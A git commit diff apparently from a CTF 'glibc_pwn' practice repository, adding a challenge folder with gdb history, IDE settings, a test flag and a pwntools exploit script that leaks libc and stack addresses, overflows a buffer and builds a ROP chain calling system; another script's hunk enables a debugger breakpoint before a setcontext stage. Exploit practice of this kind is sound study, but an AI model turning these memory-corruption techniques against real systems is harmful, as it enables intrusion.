update

cd630731 · _sky123_ · 408db29a · cd630731 · cd630731 · cd630731
13 changed file
--- a/glibc_pwn/21st_century/.gdb_history
+++ b/glibc_pwn/21st_century/.gdb_history
+vmmap
+vmmap 0x7fff92400fa8
+vmmap 0x7f42666277bf
+vmmap
+p/x 0x7f42666277bf-0x7f4266607000
+vmmap 0x207bf
+vmmap 0x7ffebffc9038
+p/x 0x7ffebffc9038-0x7ffebffa9000
+p/x 0x7ffebffca000-0x7f42666277bf
+vmmap leak_stack_addr
+vmmap 0x7f757da76000
+checksec
+q
+c
+i b
+c
+ni
+r rax
+x/20gx 0x55b19ac43000
+q
+c
+ni
+x/20gx 0x55900b7f4000
+x/20gx 0x55900b7f4000-0x10
+heap
+stack 30
+canary
+heap
+heapinfo
+bins
+vmmap
+tls
+x/20gx 0x7f273e308700
+canary
+vmmap 0x7f273e308700
+i b
+x/30i 0x00005648aca008f6
+c
+stack 30
+telescope 0x7ffe2d06b768
+telescope 0x7ffe2d06b768-8
+p valloc
+x/30i 0x7f4a76e24610
+c
+c
+q
+c
+x/20i 0x557da3000b41
+p ptr
+p &ptr
+x/gx $rebase(0x2021A0)
+x/gx $rebase(0x2021A0)-0x20
+x/20gx $rebase(0x2021A0)-0x20
+x/20gx 0x0000557da48d97d0-20*8
+x/20gx 0x0000557da48d97d0-20
+x/20gx 0x557da32021a0-20*8
+x/20gx 0x557da32021a0-22*8
+c
+x/20gx $rebase(0x202100)
+c
+c
+ni
+bins
+heap
+x/20gx $rebase(0x202100)
+c
+q
+q
+vmmap
+q
+q
+vmmap
+i b
+c
+c
+c
+vmmap
+fini
+vmmap
+r rax
+q
+c
+fini
+p rax
+p/x $rax
+vmmap
+vmmap 0x7f861e1a6000
+canary
+search -8 0xd6047a6d46a0a400
+tls
+stack 30
+x/s 0x7ffff5da6fd0
+stack 50
+stack 100
+q
+q
--- a/glibc_pwn/21st_century/.idea/.gitignore
+++ b/glibc_pwn/21st_century/.idea/.gitignore
+# 默认忽略的文件
+/shelf/
+/workspace.xml
--- a/glibc_pwn/21st_century/.idea/21st_century.iml
+++ b/glibc_pwn/21st_century/.idea/21st_century.iml
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="PYTHON_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="jdk" jdkName="Python 2.7" jdkType="Python SDK" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
\ No newline at end of file
--- a/glibc_pwn/21st_century/.idea/inspectionProfiles/profiles_settings.xml
+++ b/glibc_pwn/21st_century/.idea/inspectionProfiles/profiles_settings.xml
+<component name="InspectionProjectProfileManager">
+  <settings>
+    <option name="USE_PROJECT_PROFILE" value="false" />
+    <version value="1.0" />
+  </settings>
+</component>
\ No newline at end of file
--- a/glibc_pwn/21st_century/.idea/misc.xml
+++ b/glibc_pwn/21st_century/.idea/misc.xml
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" project-jdk-name="Python 2.7" project-jdk-type="Python SDK" />
+</project>
\ No newline at end of file
--- a/glibc_pwn/21st_century/.idea/modules.xml
+++ b/glibc_pwn/21st_century/.idea/modules.xml
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/21st_century.iml" filepath="$PROJECT_DIR$/.idea/21st_century.iml" />
+    </modules>
+  </component>
+</project>
\ No newline at end of file
--- a/glibc_pwn/21st_century/exp.py
+++ b/glibc_pwn/21st_century/exp.py
+#!/usr/bin/env python
+
+from pwn import *
+import time
+
+# context.terminal = ['tmux', 'splitw', '-h']
+
+context.log_level = 'debug'
+
+#env = {"MALLOC_MMAP_THRESHOLD_": 0}
+#env = {"LD_PRELOAD": os.path.join(os.getcwd(), "libc.so.6")}
+p = process("./mcfc")
+#p = remote('144.202.99.46', 8080)
+#raw_input()
+#p = remote('172.17.0.1', 32781)
+gdb.attach(p, "b *$rebase(0x8E0)")
+pause()
+'''
+print p.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
+x = p.recvuntil('\x7f')[-6:] + '\x00\x00'
+p.recvuntil('\x7f')
+y = p.recvuntil('\x7f')[-6:] + '\x00\x00'
+x = u64(x)
+y = u64(y)
+'''
+p.recvuntil("gift: ")
+y = u64(p.recvn(6) + '\x00\x00')
+p.recvuntil("gift: ")
+x = u64(p.recvn(6) + '\x00\x00')
+log.info('y: ' + hex(y))
+libc = y - 0x21150 - 0x991 + 0x1322
+log.info('libc ' + hex(libc))
+log.info('x: ' + hex(x))
+stk = x - 0x178
+log.info("stk: " + hex(stk))
+#p.recvuntil('welcome\n')
+#p.sendline('BBB')
+
+p.recvuntil('data:')
+payload = 'MALLOC_MMAP_THRESHOLD_=1\x00'
+#print len(payload)
+payload += '/bin/sh\x00'
+payload = payload.ljust(0x248 - 0xc0, '\0')
+payload += p64(stk)
+p.sendline(payload)
+
+p.recvuntil('sz:')
+p.sendline('-1')
+p.recvuntil('data:')
+
+data = 'A' * 0x2700
+data += p64(0xdeadbeefdeadcafe)
+data += p64(0xdeadbeefdeadcafe)
+data += p64(0xdeadbeefdeadcafe)
+data += p64(0xdeadbeefdeadcafe)
+data += p64(0xdeadbeefdeadcafe)
+data += p64(0xdeadbeefdeadcafe)
+
+libc_system = libc + 0x45390
+pop_rdi_ret = libc + 0x21102
+binsh = libc + 0x1c61a8
+cat_flag = stk + 25
+p.sendline(data)
+
+p.recvuntil('ne more chance :)')
+
+data  = p64(0xdeadbeefdeadcafe) * 9
+data += p64(pop_rdi_ret)
+data += p64(cat_flag)
+data += p64(libc_system)
+
+p.sendline(data)
+p.interactive()
+
+
--- a/glibc_pwn/21st_century/flag
+++ b/glibc_pwn/21st_century/flag
+flag{test_flag}
--- a/glibc_pwn/21st_century/ld-2.23.so
+++ b/glibc_pwn/21st_century/ld-2.23.so
--- a/glibc_pwn/21st_century/libc-2.23.so
+++ b/glibc_pwn/21st_century/libc-2.23.so
--- a/glibc_pwn/21st_century/mcfc
+++ b/glibc_pwn/21st_century/mcfc
--- a/glibc_pwn/33 xl/.gdb_history
+++ b/glibc_pwn/33 xl/.gdb_history
-q
 vmmap
 bins
 q
@@ -254,3 +253,4 @@ ni
 q
 heap
 q
+ni
--- a/glibc_pwn/33 xl/exp.py
+++ b/glibc_pwn/33 xl/exp.py
@@ -123,8 +123,8 @@ frame.rsp = payload_addr + 0x10
 frame.rip = pop_rax_ret
 add(p64(0) * 2 + p64(libc.sym['setcontext'] + 61) + str(frame)[0x28:])  # 13

-# gdb.attach(p, "b *{}\nc".format(magic_gadget))
-# pause()
+gdb.attach(p, "b *{}\nc".format(magic_gadget))
+pause()
 p.sendafter("Please input your choice > ", "1")

 p.interactive()